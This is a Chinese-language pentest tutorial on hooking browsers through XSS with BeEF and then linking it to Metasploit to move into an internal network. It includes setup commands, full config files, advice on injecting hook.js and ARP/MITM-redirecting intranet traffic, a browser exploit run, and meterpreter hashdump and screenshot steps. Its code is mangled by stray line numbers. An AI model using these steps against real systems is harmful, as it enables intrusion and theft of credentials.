- 內網滲透一:利用Xss漏洞進入內網
-
0x01:科普
Beef目前歐美最流行的WEB框架攻擊平臺,全稱:The Browser Exploitation Framework Project. Beef利用簡單的XSS漏洞,通過一段編寫好的JavaScript(hook.js)控制目標主機的瀏覽器,通過目標主機瀏覽器獲得該主機的詳細信息,並進一步掃描內網,配合metasploit絕對是內網滲透一大殺器。
0x02安裝
Kali linux 系統默認未安裝beef,需要自行安裝。
12apt-get update
apt-get install beef-xss
0x03入門
0x03.1啓動
主目錄:
/usr/share/beef-xss
12cd /usr/share/beef-xss
./beef
127.0.0.1:3000/ui/pannel
賬號密碼
beef/beef
demos:Beef-Xss ip:3000/demos/butcher/index.html
測試兩臺主機網絡通信是否正常:
訪問Beef demo頁面
demo頁面嵌入了hook.js 訪問->中招
0x04掛馬:
在正常頁面添加script標籤,嵌入惡意腳本
在實際滲透中(需要一個公網的IP),如何讓受害者訪問我們嵌有hook.js的頁面呢?
當然,這位同學用的是Xss平臺,而不是beef,利用Beef的話,不僅能得到後臺管理員的Cookie,再配合Metasploit,還能以管理員主機瀏覽器當做跳板,進入公司內網。
Online Browersers->右擊->Use As Proxy
再配合ARP攻擊,MITM中間人攻擊,對內網內所有Http請求重定向基本...(這裏露出一個你懂的WS笑容)
Beef後臺檢測到有主機上線(感覺好像當年玩的灰鴿子、上興 =。= 囧)
通過瀏覽器,我們可以看到目標主機的很多信息:
瀏覽器信息:名稱版本Browser UA StringBrowser PlatformWindows size插件基本信息:FlashVBS腳本Web SockQuick Time...Api信息Cookie操作系統信息Date 時間日期硬件信息Cpu (32/64)屏幕分辨率是否支持觸屏And So On
用火狐瀏覽器測試
Beef功能模塊組件
常用功能/模塊
執行後,目標瀏覽器訪問任何網站都將會被重定向到bobao.360.cn,實際滲透的時候在內網實施ARP攻擊,將內網所有Http請求流量重定向到嵌入了Hook惡意腳本的頁面...(在這裏露出一個淫蕩的笑容)
Chrome Extensions:Debug:測試Http請求Exploits:利用瀏覽器漏洞進行攻擊Host:獲取受害者主機信息Mtasploit:結合Metasploit進行滲透,這個也是本文的重點。Network:進行Doser、ping、DNS枚舉、端口掃描等等Social Enhineering:社工模塊0x05與Metasploit聯動
Beef配置文件
/usr/share/beef-xss
/config.yaml12metasploit:
enable:
false
改成
12metasploit:
enable:
true
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106# Copyright (c)
2006
-
2013
Wade Alcorn - wade
@bindshell
.net
# Browser Exploitation Framework (BeEF) - http:
//beefproject.com
# See the file
'doc/COPYING'
for
copying permission
#
# BeEF Configuration file
beef:
version:
'0.4.4.5-alpha'
debug:
false
restrictions:
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet:
"0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet:
"127.0.0.1/32"
permitted_ui_subnet:
"0.0.0.0/0"
http:
debug:
false
#Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host:
"0.0.0.0"
port:
"3000"
# Decrease
this
setting up to
1000
if
you want more responsiveness when sending modules and retrieving results.
# It's not advised to decrease it with tons of hooked browsers (more than
50
),
# because it might impact performance. Also, enable WebSockets is generally better.
xhr_poll_timeout:
5000
#
if
running behind a nat set the
public
ip address here
#
public
:
""
#public_port:
""
# port setting is experimental
# DNS
dns_host:
"localhost"
dns_port:
53
panel_path:
"/ui/panel"
hook_file:
"/hook.js"
hook_session_name:
"BEEFHOOK"
session_cookie_name:
"BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
restful_api:
allow_cors:
false
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable:
false
secure:
true
# use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port:
61985
# WS: good success rate through proxies
secure_port:
61986
# WSSecure
ws_poll_timeout:
1000
# poll BeEF every second
# Imitate a specified web server (
default
root page,
404
default
error page,
'Server'
HTTP response header)
web_server_imitation:
enable:
true
type:
"apache"
#supported: apache, iis
# Experimental HTTPS support
for
the hook / admin / all other Thin managed web services
https:
enable:
false
# In production environments, be sure to use a valid certificate signed
for
the value
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key:
"beef_key.pem"
cert:
"beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem
"dm-postgres-adapter"
# or
# gem
"dm-mysql-adapter"
#
if
you want to
switch
drivers from sqlite to postgres (or mysql).
# Finally, run a
'bundle install'
command and start BeEF.
driver:
"sqlite"
# db_file is only used
for
sqlite
db_file:
"db/beef.db"
# db connection information is only used
for
mysql/postgres
db_host:
"localhost"
db_port:
5432
db_name:
"beef"
db_user:
"beef"
db_passwd:
"beef123"
db_encoding:
"UTF-8"
# Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
credentials:
user:
"beef"
passwd:
"beef"
# Autorun modules as soon the browser is hooked.
# NOTE: only modules with target type
'working'
or
'user_notify'
can be run automatically.
autorun:
enable:
true
# set
this
to FALSE
if
you don't want to allow auto-run execution
for
modules with target->user_notify
allow_user_notify:
true
crypto_default_value_length:
80
# Enable client-side debugging
client:
debug:
false
# You may override
default
extension configuration parameters here
extension:
requester:
enable:
true
proxy:
enable:
true
metasploit:
enable:
true
social_engineering:
enable:
true
evasion:
enable:
false
console:
shell:
enable:
false
ipec:
enable:
true
12345678910111213141516171819202122232425262728293031323334353637# Copyright (c)
2006
-
2013
Wade Alcorn - wade
@bindshell
.net
# Browser Exploitation Framework (BeEF) - http:
//beefproject.com
# See the file
'doc/COPYING'
for
copying permission
#
# Enable MSF by changing extension:metasploit:enable to
true
# Then set msf_callback_host to be the
public
IP of your MSF server
#
# Ensure you load the xmlrpc
interface
in Metasploit
# msf > load msgrpc ServerHost=
10.211
.
55.2
Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
extension:
metasploit:
name:
'Metasploit'
enable:
true
host:
"172.16.244.129"
port:
55552
user:
"msf"
pass:
"abc123"
uri:
'/api'
ssl:
false
ssl_version:
'SSLv3'
ssl_verify:
true
callback_host:
"172.16.244.129"
autopwn_url:
"autopwn"
auto_msfrpcd:
false
auto_msfrpcd_timeout:
120
msf_path: [
{os:
'osx'
, path:
'/opt/local/msf/'
},
{os:
'livecd'
, path:
'/opt/metasploit-framework/'
},
{os:
'bt5r3'
, path:
'/opt/metasploit/msf3/'
},
{os:
'bt5'
, path:
'/opt/framework3/msf3/'
},
{os:
'backbox'
, path:
'/opt/metasploit3/msf3/'
},
{os:
'win'
, path:
'c:\\metasploit-framework\\'
},
{os:
'custom'
, path:
'/usr/share/metasploit-framework/'
}
]
修改 host callback_host兩參數,改爲beef主機IP
重啓postgresq、metasploit、服務
service postgresql restart & service metasploit restart重啓Beef
啓動beef這裏提示已經載入246個metasploit的EXP,MSF更新到最新版應該有五六百個EXP
進入Beef後臺(莫名成了245 =。=!)
use exploit/windows/browser/ie_execcommand_uafshow optionsset srvhost 172.16.244.129exploit/run靶機被強行跳轉到被監聽的URL
MSF成功監聽到(但,貌似是虛擬機裝的XP把這個漏洞補了,所以沒產生session會話)
如果XP沒有打補丁,即存在這個EXP針對的漏洞,這裏會產生一個session會話
session -i 1screenshot 截屏:截取遭釣魚主機的屏幕到本地文件
sysinfo 查看系統信息
hashdump dump目標主機的用戶Hash